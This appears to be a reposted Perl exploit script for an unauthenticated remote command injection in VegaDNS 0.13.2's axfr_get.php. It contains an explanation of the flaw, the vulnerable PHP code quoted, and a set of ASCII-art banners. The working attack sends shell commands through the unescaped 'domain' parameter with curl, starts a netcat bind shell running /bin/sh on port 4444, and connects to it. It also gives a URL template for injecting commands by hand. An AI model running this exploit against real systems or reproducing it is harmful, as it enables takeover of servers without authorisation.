|
VegaDNS 0.13.2 - Remote Command Injection
|
|
来源:justanotherhacker.com 作者:Wireghoul 发布时间:2016-09-21
|
|
#!/usr/bin/perl
$izd= qq{
██╗███████╗██╗ ██╗███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗
██║╚══███╔╝██║ ██║████╗ ██║██╔══██╗ ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
██║ ███╔╝ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██████╔╝██║ ██║██████╔╝
██║ ███╔╝ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██╔══██╗██║ ██║██╔═══╝
██║███████╗╚██████╔╝██║ ╚████║██║ ██║ ██████╔╝██║ ██║╚██████╔╝██║
╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
};$vg=qq{
▀ ▐░░▄ ▄▄▄▄▄▄▄
▀▀ ▄░ ▐▀▄▀▄ ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
▀▀▀ ▐▄▄░ ▀▐▄ ▄▀▄ ▄ ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
▀ ▄ ▐▀▄ ▀▄░ ▄▄░░ ▀▓▓▓▓▓▓▓▓▓▌
▐▀▄▀▄ ▀▀▄▀▄ ▓▌░░ ▄▄▐▓▀▓▓░▀▓▓▓▌
▀▄▀▄▀▄░ ▐▀▄▀▄ ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄ ▄▄▄▓▓▓▓▄▄▄
▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓ ░░ ▒░░ ▀▀▒▒▒▓▓▒░░░ ░░▒▒▄
▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄ ▒░▒░░ ░░▒░ ░░▓
▐▄ ░░░ ░▒░░▒▌ █▄▒░▄ ▄▓▒░ ▐░░ ░░░▒░ ░░
▓▓░▄▓ ░▒░ ░░▐▓ ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░ ░ ░░░░
▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░ ░░▒▒▒░▒
█░░ ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
▐▒▒▒ █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░ ░ ░░▒░░░ ░▒
▓▒░░▐▒░ ░▓ ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░ ░░░░▒▄░░▒░░ ░▒
▓▒ ░▒▒▒█ ░▒▓ ▐▒▓░▒▒░ ▐░░ ▀▒▒▒░░░ ░ ▐░░▒▒▒ ░ ░
█░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░ ░ ░░░░░ ░░▒▒▒ ░ ▒▒
▀▓▓▀░▓▌▒░▒ ░▒▓▓▓▒▒▒░░░░ ░ ░░▒▒░ ░ ░░▒
▀▀▓▓▌▀░ ░ ░▐▓▓▓▒▓▓▓▄░░░▄ ▐░░░▒▒▒▀ ▐░▒▄░ ▐░░░▒
▐▒▒░░▄▓▓░▌ ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░ ░░▒▒▒▓
▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
▓▒░░░▄ ░░▒▓▀ ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
▀▓▄▒▒▒░░░▒▓ ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
▀▀▀▀ ▀ ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░ ▒
▓▒▒▓▌░░░░░░░▒▌░░░░ ░ ░ ▀ ░▄
▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀ ░░░ ░░░▒▌
▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄ ░░░░░▐░
▄▐█▒ ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀ ▀ ░░▒▌
▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░ ░ ░ ▒▒█▀
▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌ ░ ▐░ ░ ░▒
▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░ ░ ▐░░░ ░█
▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌ ░ ▐░░░ ░░▒
▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░ ░░░░ ░░▒
▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░ ░░░░ ░░
▄▒░░░░ ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░ ░ ░░░░ ░░▒
▒░░░░░░▒▒▓▓▓▓▓▓▓█ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ▐▒▌
▒▀░░░▒░░▓▒▓▓▓▓▓▌▀ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ░▒▌
▓ ░▒░░░▀▀▒▓▓▓▓▓▌ ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌ ▀▓▓▓▓▓▓▓▓▒░ ░░░ ░▄░▒▓▌
░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀ ▒░ ░ ░░▓▓▄
░ ▓ ▓▒░ ░░▒▀▒░▒▄
▄ ░ ▀ ▓▒░░▄░░░░░▀░░░▌░░▒
░ ▄▄▀ ▀▒▒▒▒▒▄ ▄░░░░ ▀▀
░░░ ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
░ ░▀░░ ▀▀▒▒▒▒▀ ▀▒ ▄
▄▄▄▄▄▄ ▄▀▒▓▌▄ ▀▄ ░ ░
▓▓▓▓▌▄ ▄▓▓▓▓▓▓▓ ▒ ▄ ░ ▄
▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓ ░ ▀▓ ▄
▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀ ░ ▀▄░▒▌▄▄
▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀ ▄▓▄▄▄▄▄▒▓▓▓▓▄
▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█ ▐▓████▓▓▓▓▓▓▒▓▓
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█ ▐▓░░░▒▓▓▓▓▒▓▓
▐▓▓░▒▓▓▓▓▓▓▓
▐▓▓▓▓▓▓▒▒▓▌
▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
██▒░░░░░░░▓▓███
};$b=qq{
██╗ ██╗███████╗ ██████╗ █████╗ ██████╗ ███╗ ██╗███████╗
██║ ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗ ██║██╔════╝
██║ ██║█████╗ ██║ ███╗███████║██║ ██║██╔██╗ ██║███████╗
╚██╗ ██╔╝██╔══╝ ██║ ██║██╔══██║██║ ██║██║╚██╗██║╚════██║
╚████╔╝ ███████╗╚██████╔╝██║ ██║██████╔╝██║ ╚████║███████║
╚═══╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═══╝╚══════╝
██████╗ ███████╗███╗ ███╗ ██████╗ ████████╗███████╗
██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
██████╔╝█████╗ ██╔████╔██║██║ ██║ ██║ █████╗
██╔══██╗██╔══╝ ██║╚██╔╝██║██║ ██║ ██║ ██╔══╝
██║ ██║███████╗██║ ╚═╝ ██║╚██████╔╝ ██║ ███████╗
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██████╗ ██╗ ██╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ██╔══██╗╚██╗ ██╔╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██████╔╝ ╚████╔╝
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██╗ ╚██╔╝
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██████╔╝ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
▄
▄█▀ ▀█▄▄
▄▄▓▀▀ ▀▓▄▄
▄▓▓▀ ▀█▓▄
▄▓▓▀ ▀▓▓▓▄
▄▓▓█▀ ▀▓▓▄▄
▄▓▓▓▀ ▀▓▓▓▄
▄▓▓▓▀ ▀▓▓▓▓
▓▓▓▓▀ ▀▓▓▓▓▄
▓▓▓▓█ ▀▓▓▓▓
▐▓▓▓▀ ▓▓▓▌
▓▓▓▌ ▐▓▓▓
▓▓▓▌ ▄▓▓▓
▓▓▓▓ ▄▓▓▓
▓▓▓▓▓▓▓▓▓▓██ ██▓▓▓▓▓▓▓▓▓▓
▀▀▀▀ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▀▀█
▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀ ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄
▄▓▓▓▓█▀▀▀ ▓▓█ ▐▓▓ ▀▀▀█▓▓▓▓▓
▓▓▓ ▐▓█ ▀▓▌ ▓▓▓
█▓▌ ▓▀ ▌ ▀▓ ▐▓▓
▀▓ ▄ ▄▀ ▐ ▌ ▓▓ ▐▄ █ ▀▓▄ ▄▌ ▓▀
█ ▀▓▄ ▄▓█ ▄▓ ▐▓▓▌ █▓ ▀▓▄▄ ▄▓▀ ▓
▄▌ █▓▓▓▓▓▀ ▓▓▓▄▓▌▐▓▄▄▓▓ ▀▓▓▓▄▓▓▀ ▐▄
▓▓ █▀▀ ▀█▀ ▀▓
▓▓ ▄ ▄▀ ▄ ▄ ▓▓
▓▓▓▄ ▄▓▀ ▄█ ▄ ▄ ▀▄ ▀▓▄ ▓▓▓
████▀▀▀▀▀▀▀▀▀ ▓▀ ▄ ▄ ▓ █ ▓ ▀▀▀▀▀▀▀▀▀████
▄▓▀ ▓ ▄▌▐ ▐ ▌ ▌▐▓ ▓ ▓▄
▄▓ ▄▄▓▌▐▓ ▐ ▓ ▓ ▓ ▐▄ ▌ ▓▌▐▓▄▄ ▓▓
▓▓▓█▀▀ ▀█▓▓▌ ▓ ▐▓ █▌ ▓ ▓▓█▀ ▀▀█▓▓▓
█▀ ▀ ▐▓▄▓▌ ▐▓▄▓▌ ▀ ▀█
▀ ▀▀
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
| |/ : || || : \ | / \| / || . || : || : || |/\
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
: : :/ : :/
: : :
};$g=qq{
██████╗ ██████╗ ███████╗███████╗████████╗███████╗
██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
██║ ███╗██████╔╝█████╗ █████╗ ██║ ███╔╝
██║ ██║██╔══██╗██╔══╝ ██╔══╝ ██║ ███╔╝
╚██████╔╝██║ ██║███████╗███████╗ ██║ ███████╗
╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝ ╚═╝ ╚══════╝
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
█████╗ ███╗ ██╗ █████╗ ██╗ ██╗ ██╗███████╗██╗███████╗
██╔══██╗████╗ ██║██╔══██╗██║ ╚██╗ ██╔╝██╔════╝██║██╔════╝
███████║██╔██╗ ██║███████║██║ ╚████╔╝ ███████╗██║███████╗
██╔══██║██║╚██╗██║██╔══██║██║ ╚██╔╝ ╚════██║██║╚════██║
██║ ██║██║ ╚████║██║ ██║███████╗██║ ███████║██║███████║
╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝╚══════╝l
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# ← · ↑ · → · ↓ · <img draggable="false" class="emoji" alt="↖" src="https://s.w.org/images/core/emoji/2/svg/2196.svg"> · <img draggable="false" class="emoji" alt="↗" src="https://s.w.org/images/core/emoji/2/svg/2197.svg"> · <img draggable="false" class="emoji" alt="↘" src="https://s.w.org/images/core/emoji/2/svg/2198.svg"> · <img draggable="false" class="emoji" alt="↙" src="https://s.w.org/images/core/emoji/2/svg/2199.svg">
print " ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
